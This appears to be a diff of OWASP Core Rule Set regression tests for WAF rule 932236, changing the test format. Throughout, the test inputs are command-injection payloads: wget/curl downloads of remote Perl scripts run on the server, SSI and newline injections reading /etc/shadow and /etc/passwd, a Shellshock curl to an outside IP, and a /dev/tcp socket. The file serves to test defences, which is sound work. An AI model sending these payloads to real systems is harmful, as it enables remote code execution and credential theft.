"OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 22 desc: System Command Injection (932236) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 23 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log: + expect_ids: 
[932236] + - test_id: 24 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 25 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - 
arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 26 desc: RCE from test 932236.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 27 desc: RCE from test 932236.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 28 desc: RCE from test 932236.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 29 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - 
test_title: 932236-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 30 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 31 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 32 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-33 + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 34 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 36 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 37 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, 
br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 38 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 39 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 
"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=`cut crs312``dig 34test`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-40 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-41 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-42 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=`cut crs312``dig 34test`" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 40 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + log: + expect_ids: [932236] + - test_id: 41 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + 
Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932236] + - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-43 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 